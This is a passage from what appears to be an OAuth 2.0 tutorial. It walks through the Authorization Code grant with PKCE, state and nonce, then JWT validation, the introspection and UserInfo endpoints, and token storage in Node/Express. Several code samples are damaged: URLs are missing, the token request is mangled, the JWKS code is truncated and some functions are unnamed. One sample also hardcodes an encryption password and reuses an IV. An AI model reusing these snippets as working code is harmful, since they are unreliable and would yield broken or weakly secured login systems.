In many cases, companies are also leveraging easily integratable auth systems like FusionAuth to provide this feature.
Enterprise login and registration
The Enterprise login and registration mode is when your application allows users to sign up or log in with an enterprise identity provider such as a corporate Active Directory. This mode is very similar to the Third-party login and registration mode, but with a few salient differences.
First, it rarely requires the user to grant permissions to your application using a permission grant screen. Typically, a user does not have the option to grant or restrict permissions for your application. These permissions are usually managed by IT in an enterprise directory or in your application.
Second, this mode does not apply to all users of an application. In most cases, this mode is only available to the subset of users who exist in the enterprise directory. The rest of your users will either log in directly to your application using Local login and registration or through the Third-party login and registration mode. In some cases, the user’s email address determines the authentication source.
You might have noticed some login forms only ask for your email on the first step like this:
Knowing a user’s email domain allows the OAuth server to determine where to send the user to log in or if they should log in locally. If you work at Example Company, proud purveyors of TWGTL, providing
brian@example.com to the login screen allows the OAuth server to know you are an employee and should be authenticated against a corporate authentication source. If instead you enter
dan@gmail.com, you won’t be authenticated against that directory.
Outside of these differences, this mode behaves much the same as the Third-party login and registration mode.
This is the final mode where users can register and log in to your application. The remaining modes are used entirely for authorization, usually to application programming interfaces (APIs). We’ll cover these modes next.
Third-party service authorization
The third-party service authorization mode is quite different from the Third-party login and registration mode; don’t be deceived by the similar names. Here, the user is already logged into your application. The login could have been through a native form (as discussed above) or using the Local login and registration mode, the Third-party login and registration mode, or the Enterprise login and registration mode. Since the user is already logged in, all they are doing is granting access for your application to call third-party’s APIs on their behalf.
For example, let’s say a user has an account with TWGTL, but each time they complete a ToDo, they want to let their WUPHF followers know. (WUPHF is an up and coming social network; sign up at getwuphf.com.) To accomplish this, TWGTL provides an integration that will automatically send a WUPHF when the user completes a ToDo. The integration uses the WUPHF APIs and calling those requires an access token. In order to get an access token, the TWGTL application needs to log the user into WUPHF via OAuth.
To hook all of this up, TWGTL needs to add a button to the user’s profile page that says “Connect your WUPHF account”. Notice it doesn’t say “Login with WUPHF” since the user is already logged in; the user’s identity for TWGTL is not delegated to WUPHF. Once the user clicks this button, they will be taken to WUPHF’s OAuth server to log in and grant the necessary permissions for TWGTL to WUPHF for them.
Since WUPHF doesn’t actually exist, here’s an example screenshot from Buffer, a service which posts to your social media accounts such as Twitter.
When you connect a Twitter account to Buffer, you’ll see a screen like this:
The workflow for this mode looks like this:
- A user visits TWGTL and logs into their account.
- They click the “My Profile” link.
- On their account page, they click the “Connect your WUPHF account” button.
- This button takes them over to WUPHF’s OAuth server.
- They log in to WUPHF.
- WUPHF presents the user with the “permission grant screen” and asks if TWGTL can WUPHF on their behalf.
- The user grants TWGTL this permission.
- WUPHF redirects the browser back to TWGTL where it calls WUPHF’s OAuth server to get an access token.
- TWGTL stores the access token in its database and can now call WUPHF APIs on behalf of the user. Success!
First-party service authorization
The First-party service authorization mode is the inverse of the Third-party service authorization mode. When another application wishes to call your APIs on behalf of one of your users, you are in this mode. Here, your application is the “third-party service” discussed above. Your application asks the user if they want to grant the other application specific permissions. Basically, if you are building the next Facebook and want developers to be able to call your APIs on behalf of their users, you’ll need to support this OAuth mode.
With this mode, your OAuth server might display a “permission grant screen” to the user asking if they want to grant the third-party application permissions to your APIs. This isn’t strictly necessary and depends on your requirements.
Machine-to-machine authorization
The Machine-to-machine authorization OAuth mode is different from the previous modes we’ve covered. This mode does not involve users at all. Rather, it allows an application to interact with another application. Normally, this is backend services communicating with each other via APIs.
Here, one backend needs to be granted access to the other. We’ll call the first backend the source and the second backend the target. To accomplish this, the source authenticates with the OAuth server. The OAuth server confirms the identity of the source and then returns a token that the source will use to call the target. This token can also include permissions that are used by the target to authorize the call the source is making.
Using our TWGTL example, let’s say that TWGTL has two microservices: one to manage ToDos and another to send WUPHFs. Overengineering is fun! The ToDo microservice needs to call the WUPHF microservice. The WUPHF microservice needs to ensure that any caller is allowed to use its APIs before it WUPHFs.
The workflow for this mode looks like:
- The ToDo microservice authenticates with the OAuth server.
- The OAuth server returns a token to the ToDo microservice.
- The ToDo microservice calls an API in the WUPHF microservice and includes the token in the request.
- The WUPHF microservice verifies the token by calling the OAuth server (or verifying the token itself if the token is a JWT).
- If the token is valid, the WUPHF microservice performs the operation.
Device login and registration
The Device login and registration mode is used to log in to (or register) a user’s account on a device that doesn’t have a rich input device like a keyboard. In this case, a user connects the device to their account, usually to ensure their account is active and the device is allowed to use it.
A good example of this mode is setting up a streaming app on an Apple TV, smart TV, or other device such as a Roku. In order to ensure you have a subscription to the streaming service, the app needs to verify the user’s identity and connect to their account. The app on the Apple TV device displays a code and a URL and asks the user to visit the URL. The workflow for this mode is as follows:
- The user opens the app on the Apple TV.
- The app displays a code and a URL.
- The user types in the URL displayed by the Apple TV on their phone or computer.
- The user is taken to the OAuth server and asked for the code.
- The user submits this form and is taken to the login page.
- The user logs into the OAuth server.
- The user is taken to a “Finished” screen.
- A few seconds later, the device is connected to the user’s account.
This mode often takes a bit of time to complete because the app on the Apple TV is polling the OAuth server. We won’t go over this mode because our OAuth Device Authorization article covers it in great detail.
OAuth Grants
Now that we have covered the real world OAuth modes, let’s dig into how these are actually implemented using the OAuth grants. OAuth grants are:
- Authorization Code grant
- Implicit grant
- Resource Owner’s Password Credentials grant
- Client Credentials grant
- Device grant
We’ll cover each grant type below and discuss how it is used, or not, for each of the OAuth modes above.
Authorization Code grant
This is the most common OAuth grant and also the most secure. It relies on a user interacting with a browser (Chrome, Firefox, Safari, etc.) in order to handle OAuth modes 1 through 6 above. This grant requires the interaction of a user, so it isn’t usable for the Machine-to-machine authorization mode. All of the interactive modes we covered above involve the same parties and UI, except when a “permission grant screen” is displayed.
A few terms we need to define before we dive into this grant.
- Authorize endpoint: This is the location that starts the workflow and is a URL that the browser is taken to. Normally, users register or log in at this location.
- Authorization code: This is a random string of printable ASCII characters that the OAuth server includes in the redirect after the user has registered or logged in. This is exchanged for tokens by the application backend.
- Token endpoint: This is an API that is used to get tokens from the OAuth server after the user has logged in. The application backend uses the Authorization code when it calls the Token endpoint.
In this section we will also cover PKCE (Proof Key for Code Exchange - pronounced Pixy). PKCE is a security layer that sits on top of the Authorization Code grant to ensure that authorization codes can’t be stolen or reused. The application generates a secret key (called the code verifier) and hashes it using SHA-256. This hash is one-way, so it can’t be reversed by an attacker. The application then sends the hash to the OAuth server, which stores it. Later, when the application is getting tokens from the OAuth server, the application will send the server the secret key and the OAuth server will verify that the hash of the provided secret key matches the previously provided value. This is a good protection against attackers that can intercept the authorization code, but don’t have the secret key.
NOTE: PKCE is not required for standard web browser uses of OAuth with the Authorization Code grant when the application backend is passing both the
client_id and
client_secret to the Token endpoint. We will cover this in more detail below, but depending on your implementation, you might be able to safely skip implementing PKCE. I recommend always using it but it isn’t always required.
Let’s take a look at how you implement this grant using a prebuilt OAuth server like FusionAuth.
Login/register buttons
First, we need to add a “Login” or “My Account” link or button to our application; or if you are using one of the federated authorization modes from above (for example the Third-party service authorization mode), you’ll add a “Connect to XYZ” link or button. There are two ways to connect this link or button to the OAuth server:
- Set the
hrefof the link to the full URL that starts the OAuth Authorization Code grant.
- Set the
hrefto point to application backend code that does a redirect.
Option #1 is an older integration that is often not used in practice. There are a couple of reasons for this. First, the URL is long and not all that nice looking. Second, if you are going to use any enhanced security measures like PKCE, you’ll need to write code that generates extra pieces of data for the redirect. We’ll cover PKCE and OpenID Connect’s
nonce parameter as we set up our application integration below.
Before we dig into option #2, though, let’s quickly take a look at how option #1 works. Old school, we know.
First, you’ll need to determine the URL that starts the Authorization Code grant with your OAuth server as well as include all of the necessary parameters required by the specification. We’ll use FusionAuth as an example, since it has a consistent URL pattern.
Let’s say you are running FusionAuth and it is deployed to. The URL for the OAuth authorize endpoint will also be located at:
Next, you would insert this URL with a bunch of parameters (the meaning of which we will cover below) into an anchor tag like this:
<a href="?[a bunch of parameters here]">Login</a>
This anchor tag would take the user directly to the OAuth server to start the Authorization Code grant.
But, as we discussed above, this method is not generally used. Let’s take a look at how Option #2 is implemented instead. Don’t worry, you’ll still get to learn about all those parameters.
Rather than point the anchor tag directly at the OAuth server, we’ll point it at the TWGTL backend; let’s use the path
/login. To make everything work, we need to write code that will handle the request for
/login and redirect the browser to the OAuth server. Here’s our updated anchor tag that points at the backend controller:
<a href="">Login</a>
Next, we need to write the controller for
/login in the application. Here’s a JavaScript snippet using NodeJS/Express that accomplishes this:
router.get('/login', function(req, res, next) { res.redirect(302, '?[a bunch of parameters here]'); });
Since this is the first code we’ve seen, it’s worth mentioning you can view working code in this guide in the accompanying GitHub repository.
Authorize endpoint parameters
This code immediately redirects the browser to the OAuth server. However, if you ran this code and clicked the link, the OAuth server will reject the request because it doesn’t contain the required parameters. The parameters defined in the OAuth specifications are:
client_id- this identifies the application you are logging into. In OAuth, this is referred to as the
client. This value will be provided to you by the OAuth server.
redirect_uri- this is the URL in your application to which the OAuth server will redirect the user to after they log in. This URL must be registered with the OAuth server and it must point to a controller in your app (rather than a static page), because your app must do additional work after this URL is called.
state- technically this parameter is optional, but it is useful for preventing various security issues. This parameter is echoed back to your application by the OAuth server. It can be anything you might need to be persisted across the OAuth workflow. If you have no other need for this parameter, I suggest setting it to a large random string. If you need to have data persisted across the workflow, I suggest setting URL encoding the data and appending a random string as well.
response_type- this should always be set to
codefor this grant. This tells the OAuth server you are using the Authorization Code grant.
scope- this is also an optional parameter, but in some of the above modes, this will be required by the OAuth server. This parameter is a space separated list of strings. You might also need to include the
offlinescope in this list if you plan on using refresh tokens in your application (we’ll refresh tokens later).
code_challenge- this an optional parameter, but provides support for PKCE. This is useful when there is not a backend that can handle the final steps of the Authorization Code grant. This is known as a “public client”. There aren’t many cases of applications that don’t have backends, but if you have something like a mobile application and you aren’t able to leverage a server-side backend for OAuth, you must implement PKCE to protect your application from security issues. The security issues surrounding PKCE are out of the scope of this guide, but you can find numerous articles online about them. PKCE is also recommended by the OAuth 2.1 draft.
code_challenge_method- this is an optional parameter, but if you implement PKCE, you must specify how your PKCE
code_challengeparameter was created. It can either be
plainor
S256. We never recommend using anything except
S256which uses SHA-256 secure hashing for PKCE.
nonce- this is an optional parameter and is used for OpenID Connect. We don’t go into much detail of OpenID Connect in this guide, but we will cover a few aspects including Id tokens and the
nonceparameter. The
nonceparameter will be included in the Id token that the OAuth server generates. We can verify that when we retrieve the Id token. This is discussed later.
Let’s update our code with all of these values. While we don’t actually need to use PKCE for this guide, it doesn’t hurt anything to add it.
const clientId = '9b893c2a-4689-41f8-91e0-aecad306ecb6'; const redirectURI = encodeURI(''); const scopes = encodeURIComponent('profile offline_access openid'); // give us the id_token and the refresh token, please router.get('/login', (req, res, next) => { const state = generateAndSaveState(req, res); const codeChallenge = generateAndSaveCodeChallenge(req, res); const nonce = generateAndSaveNonce(req, res); res.redirect(302, '?' + `client_id=${clientId}&` + `redirect_uri=${redirectURI}&` + `state=${state}&` + `response_type=code&` + `scope=${scopes}&` + `code_challenge=${codeChallenge}&` + `code_challenge_method=S256&` + `nonce=${nonce}`); });
You’ll notice that we have specified the
client_id, which was likely provided to us by the OAuth server, the
redirect_uri, which is part of our application, and a
scope with the values
profile,
offline_access, and
openid (space separated). These are all usually hardcoded values since they rarely change. The other values change each time we make a request and are generated in the controller.
The
scope parameter is used by the OAuth server to determine what authorization the application is requesting. There are a couple of standard values that are defined as part of OpenID Connect. These include
profile,
offline_access and
openid. The OAuth specification does not define any standard scopes, but most OAuth servers support different values. Consult your OAuth server documentation to determine the scopes you’ll need to provide.
Here are definitions of the standard scopes in the OpenID Connect specification:
openid- tells the OAuth server to use OpenID Connect for the handling of the OAuth workflow. This additionally will tell the OAuth server to return an Id token from the Token endpoint (covered below).
offline_access- tells the OAuth server to generate and return a refresh token from the Token endpoint (covered below).
profile- tells the OAuth server to include all of the standard OpenID Connect claims in the returned tokens (access and/or id tokens).
address- tells the OAuth server to include the user’s address in the returned tokens (access and/or id tokens).
phone- tells the OAuth server to include the user’s phone number in the returned tokens (access and/or id tokens).
In order to properly implement the handling for the
state, PKCE, and
nonce parameters, we need to save these values off somewhere. They must be persisted across browser requests and redirects. There are two options for this:
- Store the values in a server-side session.
- Store the values in secure, http-only cookies (preferably encrypted).
You might choose cookies if you are building a SPA and want to avoid maintaining server side sessions.
Here is an excerpt of the above
login route with functions that generate these values.
// ... router.get('/login', (req, res, next) => { const state = generateAndSaveState(req, res); const codeChallenge = generateAndSaveCodeChallenge(req, res); const nonce = generateAndSaveNonce(req, res); // ...
Let’s cover both of these options. First, let’s write the code for each of the
generate* functions and store the values in a server-side session:
const crypto = require('crypto'); // ... // Helper method for Base 64 encoding that is URL safe function base64URLEncode(str) { return str.toString('base64') .replace(/\+/g, '-') .replace(/\//g, '_') .replace(/=/g, ''); } function sha256(buffer) { return crypto.createHash('sha256') .update(buffer) .digest(); } function generateAndSaveState(req) { const state = base64URLEncode(crypto.randomBytes(64)); req.session.oauthState = state; return state; } function generateAndSaveCodeChallenge(req) { const codeVerifier = base64URLEncode(crypto.randomBytes(64)); req.session.oauthCode = codeVerifier; return base64URLEncode(sha256(codeVerifier)); } function generateAndSaveNonce(req) { const nonce = base64URLEncode(crypto.randomBytes(64)); req.session.oauthNonce = nonce; return nonce; } // ...
This code is using the
crypto library to generate random bytes and converting those into URL safe strings. Each method is storing the values created in the session. You’ll also notice that in the
generateAndSaveCodeChallenge we are also hashing the random string using the
sha256 function. This is how PKCE is implemented when the code verifier is saved in the session and the hashed version of it is sent as a parameter to the OAuth server.
Here’s the same code (minus the require and helper methods) modified to store each of these values in secure, HTTP only cookies:
// ... function generateAndSaveState(req, res) { const state = base64URLEncode(crypto.randomBytes(64)); res.cookie('oauth_state', state, {httpOnly: true, secure: true}); return state; } function generateAndSaveCodeChallenge(req, res) { const codeVerifier = base64URLEncode(crypto.randomBytes(64)); res.cookie('oauth_code_verifier', codeVerifier, {httpOnly: true, secure: true}); return base64URLEncode(sha256(codeVerifier)); } function generateAndSaveNonce(req, res) { const nonce = base64URLEncode(crypto.randomBytes(64)); res.cookie('oauth_nonce', nonce, {httpOnly: true, secure: true}); return nonce; } // ...
You might be wondering if it is safe to be storing these values in cookies since cookies are sent back to the browser. We are setting each of these cookies to be both
httpOnly and
secure. These flags ensure that no malicious JavaScript code in the browser can read their values. If you want to secure this even further, you can also encrypt the values like this:
// ... const password = 'setec-astronomy' const key = crypto.scryptSync(password, 'salt', 24); const iv = crypto.randomBytes(16); function encrypt(value) { const cipher = crypto.createCipheriv('aes-192-cbc', key, iv); let encrypted = cipher.update(value, 'utf8', 'hex'); encrypted += cipher.final('hex'); return encrypted + ':' + iv.toString('hex'); } function generateAndSaveState(req, res) { const state = base64URLEncode(crypto.randomBytes(64)); res.cookie('oauth_state', encrypt(state), {httpOnly: true, secure: true}); return state; } function generateAndSaveCodeChallenge(req, res) { const codeVerifier = base64URLEncode(crypto.randomBytes(64)); res.cookie('oauth_code_verifier', encrypt(codeVerifier), {httpOnly: true, secure: true}); return base64URLEncode(sha256(codeVerifier)); } function generateAndSaveNonce(req, res) { const nonce = base64URLEncode(crypto.randomBytes(64)); res.cookie('oauth_nonce', encrypt(nonce), {httpOnly: true, secure: true}); return nonce; } // ...
Encryption is generally not needed, especially for the
state and
nonce parameters since those are sent as plaintext on the redirect anyways, but if you need ultimate security and want to use cookies, this is the best way to secure these values.
Logging in
At this point, the user will be taken to the OAuth server to log in or register. Technically, the OAuth server can manage the login and registration process however it needs. In some cases, a login won’t be necessary because the user will already be authenticated with the OAuth server or they can be authenticated by other means (smart cards, hardware devices, etc).
The OAuth 2.0 specification doesn’t specify anything about this process. Not a word!
In practice though, 99.999% of OAuth servers use a standard login page that collects the user’s username and password. We’ll assume that the OAuth server provides a standard login page and handles the collection of the user’s credentials and verification of their validity.
Redirect and retrieve the tokens
After the user has logged in, the OAuth server redirects the browser back to the application. The exact location of the redirect is controlled by the
redirect_uri parameter we passed on the URL above. In our example, this location is. When the OAuth server redirects the browser back to this location, it will add a few parameters to the URL. These are:
code- this is the authorization code that the OAuth server created after the user was logged in. We’ll exchange this code for tokens.
state- this is the same value of the
stateparameter we passed to the OAuth server. This is echoed back to the application so that the application can verify that the
codecame from the correct location.
OAuth servers can add additional parameters as needed, but these are the only ones defined in the specifications. A full redirect URL might look like this:
Remember that the browser is going to make an HTTP
GET request to this URL. In order to securely complete the OAuth Authorization Code grant, you should write server-side code to handle the parameters on this URL. Doing so will allow you to securely exchange the authorization
code parameter for tokens.
Let’s look at how a controller accomplishes this exchange.
First, we need to know the location of the OAuth server’s Token endpoint. The OAuth server provides this endpoint which will validate the authorization
code and exchange it for tokens. We are using FusionAuth as our example OAuth server and it has a consistent location for the Token endpoint. (Other OAuth servers may have a different or varying location; consult your documentation.) In our example, that location will be.
We will need to make an HTTP
POST request to the Token endpoint using form encoded values for a number of parameters. Here are the parameters we need to send to the Token endpoint:
code- this is the authorization code we are exchanging for tokens.
client_id- this is client id that identifies our application.
client_secret- this is a secret key that is provided by the OAuth server. This should never be made public and should only ever be stored in your application on the server.
code_verifier- this is the code verifier value we created above and either stored in the session or in a cookie.
grant_type- this will always be the value
authorization_codeto let the OAuth server know we are sending it an authorization code.
redirect_uri- this is the redirect URI that we sent to the OAuth server above. It must be exactly the same value.
Here’s some JavaScript code that calls the Token endpoint using these parameters. It also verifies the
state parameter is correct along with the
nonce that should be present in the
id_token. It also restores the saved
codeVerifier and passes that to the Token endpoint to complete the PKCE process.
// Dependencies const express = require('express'); const crypto = require('crypto'); const axios = require('axios'); const FormData = require('form-data'); const common = require('./common'); const config = require('./config'); // Route and OAuth variables const router = express.Router(); const clientId = config.clientId; const clientSecret = config.clientSecret; const redirectURI = encodeURI(''); const scopes = encodeURIComponent('profile offline_access openid'); // Crypto variables const password = 'setec-astronomy' const key = crypto.scryptSync(password, 'salt', 24); const iv = crypto.randomBytes(16); router.get('/oauth-callback', (req, res, next) => { // Verify the state const reqState = req.query.state; const state = restoreState(req, res); if (reqState !== state) { res.redirect('/', 302); // Start over return; } const code = req.query.code; const codeVerifier = restoreCodeVerifier(req, res); const nonce = restoreNonce(req, res); //('', form, { headers: form.getHeaders() }) .then((response) => { const accessToken = response.data.access_token; const idToken = response.data.id_token; const refreshToken = response.data.refresh_token; if (idToken) { let user = common.parseJWT(idToken, nonce); // parses the JWT, extracts the none, compares the value expected with the value in the JWT. if (!user) { console.log('Nonce is bad. It should be ' + nonce + ' but was ' + idToken.nonce); res.redirect(302,"/"); // Start over return; } } // Since the different OAuth modes handle the tokens differently, we are going to // put a placeholder function here. We'll discuss this function in the following // sections handleTokens(accessToken, idToken, refreshToken, req, res); }).catch((err) => {console.log("in error"); console.error(JSON.stringify(err));}); }); function restoreState(req) { return req.session.oauthState; // Server-side session } function restoreCodeVerifier(req) { return req.session.oauthCode; // Server-side session } function restoreNonce(req) { return req.session.oauthNonce; // Server-side session } module.exports = app;
common.parseJWT abstracts the JWT parsing and verification. It expects public keys to be published in JWKS format at a well known location, and verifies the audience, issuer and expiration, as well as the signature. This code can be used for access tokens, which do not have a
nonce, and Id tokens, which do.
const axios = require('axios'); const FormData = require('form-data'); const config = require('./config'); const { promisify } = require('util'); const common = {}; const jwksUri = ''; const jwt = require('jsonwebtoken'); const jwksClient = require('jwks-rsa'); const client = jwksClient({ strictSsl: true, // Default value jwksUri: jwksUri, requestHeaders: {}, // Optional requestAgentOptions: {}, // Optional timeout: 30000, // Defaults to 30s });;
At this point, we are completely finished with OAuth. We’ve successfully exchanged the authorization code for tokens, which is the last step of the OAuth Authorization Code grant.
Let’s take a quick look at the 3
restore functions from above and how they are implemented for cookies and encrypted cookies. Here is how those functions would be implemented if we were storing the values in cookies:
function restoreState(req, res) { const value = req.cookies.oauth_state; res.clearCookie('oauth_state'); return value; } function restoreCodeVerifier(req, res) { const value = req.cookies.oauth_code_verifier; res.clearCookie('oauth_code_verifier'); return value; } function restoreNonce(req, res) { const value = req.cookies.oauth_nonce; res.clearCookie('oauth_nonce'); return value; }
And here is the code that decrypts the encrypted cookies:
const password = 'setec-astronomy' const key = crypto.scryptSync(password, 'salt', 24); function decrypt(value) { const parts = value.split(':'); const cipherText = parts[0]; const iv = Buffer.from(parts[1], 'hex'); const decipher = crypto.createDecipheriv('aes-192-cbc', key, iv); let decrypted = decipher.update(cipherText, 'hex', 'utf8'); decrypted += decipher.final('utf8'); return decrypted; } function restoreState(req, res) { const value = decrypt(req.cookies.oauth_state); res.clearCookie('oauth_state'); return value; } function restoreCodeVerifier(req, res) { const value = decrypt(req.cookies.oauth_code_verifier); res.clearCookie('oauth_code_verifier'); return value; } function restoreNonce(req, res) { const value = decrypt(req.cookies.oauth_nonce); res.clearCookie('oauth_nonce'); return value; }
Tokens
Now that we’ve successfully exchanged the authorization
code for tokens, let’s look at the tokens we received from the OAuth server. We are going to assume that the OAuth server is using JWTs (JSON Web Tokens) for the access and Id tokens. OAuth2 doesn’t define any token format, but in practice access tokens are often JWTs. OpenId Connect (OIDC), on the other hand, requires the
id_token to be a JWT.
Here are the tokens we have:
access_token: This is a JWT that contains information about the user including their id, permissions, and anything else we might need from the OAuth server.
id_token: This is a JWT that contains public information about the user such as their name. This token is usually safe to store in non-secure cookies or local storage because it can’t be used to call APIs on behalf of the user.
refresh_token: This is an opaque token (not a JWT) that can be used to create new access tokens. Access tokens expire and might need to be renewed, depending on your requirements (for example how long you want access tokens to last versus how long you want users to stay logged in).
Since two of the tokens we have are JWTs, let’s quickly cover that technology here. A full coverage of JWTs is outside of the scope of this guide, but there are a couple of good JWT guides in our Token Expert Advice section.
JWTs are JSON objects that contain information about users and can also be signed. The keys of the JSON object are called “claims”. JWTs expire, but until then they can be presented to APIs and other resources to obtain access. Keep their lifetimes short and protect them as you would other credentials such as an API key. Because they are signed, a JWT can be verified to ensure it hasn’t been tampered with. JWTs have a couple of standard claims. These claims are:
aud: The intended audience of the JWT. This is usually an identifier and your applications should verify this value is as expected.
exp: The expiration instant of the JWT. This is stored as the number of seconds since Epoch (January 1, 1970 UTC).
iss: An identifier for that system which created the JWT. This is normally a value configured in the OAuth server. Your application should verify that this claim is correct.
nbf: The instant after which the JWT is valid. It stands for “not before”. This is stored as the number of seconds since Epoch (January 1, 1970 UTC).
sub: The subject of this JWT. Normally, this is the user’s id.
JWTs have other standard claims that you should be aware of. You can review these specifications for a list of additional standard claims:
User and token information
Before we cover how the Authorization Code grant is used for each of the OAuth modes, let’s discuss two additional OAuth endpoints used to retrieve information about your users and their tokens. These endpoints are:
- Introspection - this endpoint is an extension to the OAuth 2.0 specification and returns information about the token using the standard JWT claims from the previous section.
- UserInfo - this endpoint is defined as part of the OIDC specification and returns information about the user.
These two endpoints are quite different and serve different purposes. Though they might return similar values, the purpose of the Introspection endpoint is to return information about the access token itself. The UserInfo endpoint returns information about the user for whom the access token was granted.
The Introspection endpoint gives you a lot of the same information as you could obtain by parsing and validating the
access_token. If what is in the JWT is enough, you can choose whether to use the endpoint, which requires a network request, or parse the JWT, which incurs a computational cost and requires you to bundle a library. The UserInfo endpoint, on the other hand, typically gives you the same information as the
id_token. Again, the tradeoff is between making a network request or parsing the
id_token.
Both endpoints are simple to use; let’s look at some code.
The Introspect endpoint
First, we will use the Introspect endpoint to get information about an access token. We can use the information returned from this endpoint to ensure that the access token is still valid or get the standard JWT claims covered in the previous section. Besides returning the JWT claims, this endpoint also returns a few additional claims that you can leverage in your app. These additional claims are:
active: Determines if the token is still active and valid. What
activemeans depends on the OAuth server, but typically it means the server issued it, it hasn’t been revoked as far as the server knows, and it hasn’t expired.
scope: The list of scopes that were passed to the OAuth server during the login process and subsequently used to create the token.
client_id: The
client_idvalue that was passed to the OAuth server during the login process.
username: The username of the user. This is likely the username they logged in with but could be something different.
token_type: The type of the token. Usually, this is
Bearermeaning that the token belongs to and describes the user that is in control of it.
Only the
active claim is guaranteed to be included; the rest of these claims are optional and may not be provided by the OAuth server.
Let’s write a function that uses the Introspect endpoint to determine if the access token is still valid. This code will leverage FusionAuth’s Introspect endpoint, which again is always at a well-defined location:
async function (accessToken, clientId, expectedAud, expectedIss) { const form = new FormData(); form.append('token', accessToken); form.append('client_id', clientId); // FusionAuth requires this for authentication try { const response = await axios.post('', form, { headers: form.getHeaders() }); if (response.status === 200) { const data = response.data; if (!data.active) { return false; // if not active, we don't get any other claims } return expectedAud === data.aud && expectedIss === data.iss; } } catch (err) { console.log(err); } return false; }
This function makes a request to the Introspect endpoint and then parses the result, returning
true or
false. As you can see, you can’t defer all token logic to the Introspect endpoint, however. The consumer of the access token should also validate the
aud and
iss claims are as expected, at a minimum. There may be other application specific validation required as well.
The UserInfo endpoint
If we need to get additional information about the user from the OAuth server, we can use the UserInfo endpoint. This endpoint takes the access token and returns a number of well defined claims about the user. Technically, this endpoint is part of the OIDC specification, but most OAuth servers implement it, so you’ll likely be safe using it.
Here are the claims that are returned by the UserInfo endpoint:
sub: The unique identifier for the user.
name: The user’s full name.
given_name: The user’s first name.
family_name: The user’s last name.
middle_name: The user’s middle name.
nickname: The user’s nickname (i.e. Joe for Joseph).
preferred_username: The user’s preferred username that they are using with your application.
profile: A URL that points to the user’s profile page.
picture: A URL that points to an image that is the profile picture of the user.
website: A URL that points to the user’s website (i.e. their blog).
email_verified: A boolean that determines if the user’s email address has been verified.
gender: A string describing the user’s gender.
birthdate: The user’s birthdate as an ISO 8601:2004 YYYY-MM-DD formatted string.
zoneinfo: The time zone that the user is in.
locale: The user’s preferred locale as an ISO 639-1 Alpha-2 language code in lowercase and an ISO 3166-1 Alpha-2 [ISO3166‑1] country code in uppercase, separated by a dash.
phone_number: The user’s telephone number.
phone_number_verified: A boolean that determines if the user’s phone number has been verified.
address: A JSON object that contains the user’s address information. The sub-claims are:
formatted: The user’s address as a fully formatted string.
street_address: The user’s street address component.
locality: The user’s city.
region: The user’s state, province, or region.
country: The user’s country.
updated_at: The instant that the user’s profile was last updated as a number representing the number of seconds from Epoch UTC.
Not all of these claims will be present, however. What is returned depends on the scopes requested in the initial authorization request as well as the configuration of the OAuth server. You can always rely on the
sub claim, though. See the OIDC spec as well as your OAuth server’s documentation for the proper scopes and returned claims.
Here’s a function that we can use to retrieve a user object from the UserInfo endpoint. This is equivalent to parsing the
id_token and looking at claims embedded there.
async function (accessToken) { const response = await axios.get('', { headers: { 'Authorization' : 'Bearer ' + accessToken } }); try { if (response.status === 200) { return response.data; } return null; } catch (err) { console.log(err); } return null; }
Local login and registration with the Authorization Code grant
Now that we have covered the Authorization Code grant in detail, let’s look at next steps for our application code.
In other words, your application now has these tokens, but what the heck do you do with them?
If you are implementing the Local login and registration mode, then your application is using OAuth to log users in. This means that after the OAuth workflow is complete, the user should be logged in and the browser should be redirected to your application or the native app should have user information and render the appropriate views.
For our example TWGTL application, we want to send the user to their ToDo list after they have logged in. In order to log the user in to the TWGTL application, we need to create a session of some sort for them. Similar to the
state and other values discussed above, are two ways to handle this:
- Cookies
- Server-side sessions
Which of these methods is best depends on your requirements, but both work well in practice and are both secure if done correctly. If you recall from above, we put a placeholder function,
handleTokens, in our code just after we received the tokens from the OAuth server. Let’s fill in that code for each of the session options.
Storing tokens as cookies
First, let’s store the tokens as cookies in the browser and redirect the user to their ToDos:
function handleTokens(accessToken, idToken, refreshToken, req, res) { // Write the tokens as cookies res.cookie('access_token', accessToken, {httpOnly: true, secure: true}); res.cookie('id_token', idToken); // Not httpOnly or secure res.cookie('refresh_token', refreshToken, {httpOnly: true, secure: true}); // Redirect to the To-do list res.redirect('/todos', 302); }
At this point, the application backend has redirected the browser to the user’s ToDo list. It has also sent the access token, Id token, and refresh tokens back to the browser as cookies. The browser will now send these cookies to the backend each time it makes a request. These requests could be for JSON APIs or standard HTTP requests (i.e.
GET or
POST). The beauty of this solution is that our application knows the user is logged in because these cookies exist. We don’t have to manage them at all since the browser does it all for us.
The
id_token is treated less securely than the
access_token and
refresh_token for a reason. The
id_token should never be used to access protected resources; it is simply a way for the application to obtain read-only information about the user. If, for example, you want your SPA to update the user interface to greet the user by name, the
id_token is available.
These cookies also act as our session. Once the cookies disappear or become invalid, our application knows that the user is no longer logged in. Let’s take a look at how we use these tokens to make an authorized API call. You can also have server side html generated based on the
access_token, but we’ll leave that as an exercise for the reader.
This API retrieves the user’s ToDos from the database. We’ll then generate the user interface in browser side code.
// include axios axios.get('/api/todos') .then(function (response) { buildUI(response.data); buildClickHandler(); }) .catch(function(error) { console.log(error); }); function buildUI(data) { // build our UI based on the todos returned and the id_token } function buildClickHandler() { // post to API when ToDo is done }
You may have noticed a distinct lack of any token sending code in the
axios.getcall. This is one of the strengths of the cookie approach. As long as we’re calling APIs from the same domain, cookies are sent for free. If you need to send cookies to a different domain, make sure you check your CORS settings.
What does the server side API look like? Here’s the route that handles
/api/todos:
// Dependencies const express = require('express'); const common = require('./common'); const config = require('./config'); const axios = require('axios'); // Router & constants const router = express.Router(); router.get('/', (req, res, next) => { common.authorizationCheck(req, res).then((authorized) => { if (!authorized) { res.sendStatus(403); return; } const todos = common.getTodos(); res.setHeader('Content-Type', 'application/json'); res.end(JSON.stringify(todos)); }).catch((err) => { console.log(err); }); }); module.exports = router;
And here’s the
authorizationCheck method
const axios = require('axios'); const FormData = require('form-data'); const config = require('./config'); const { promisify } = require('util'); common.authorizationCheck = async (req, res) => { const accessToken = req.cookies.access_token; if (!accessToken) { return false; } try { let jwt = await common.parseJWT(accessToken); return true; } catch (err) { console.log(err); return false; } };
Storing tokens in the session
Next, let’s look at the alternative implementation. We’ll create a server-side session and store all of the tokens there. This method also writes a cookie back to the browser, but this cookie only stores the session id. Doing so allows our server-side code to lookup the user’s session during each request. Sessions are generally handled by the framework you are using, so we won’t go into many details here. You can read up more on server-side sessions on the web if you are interested.
Here’s code that creates a server-side session and redirects the user to their ToDo; // Redirect to the To-do list res.redirect('/todos', 302); }
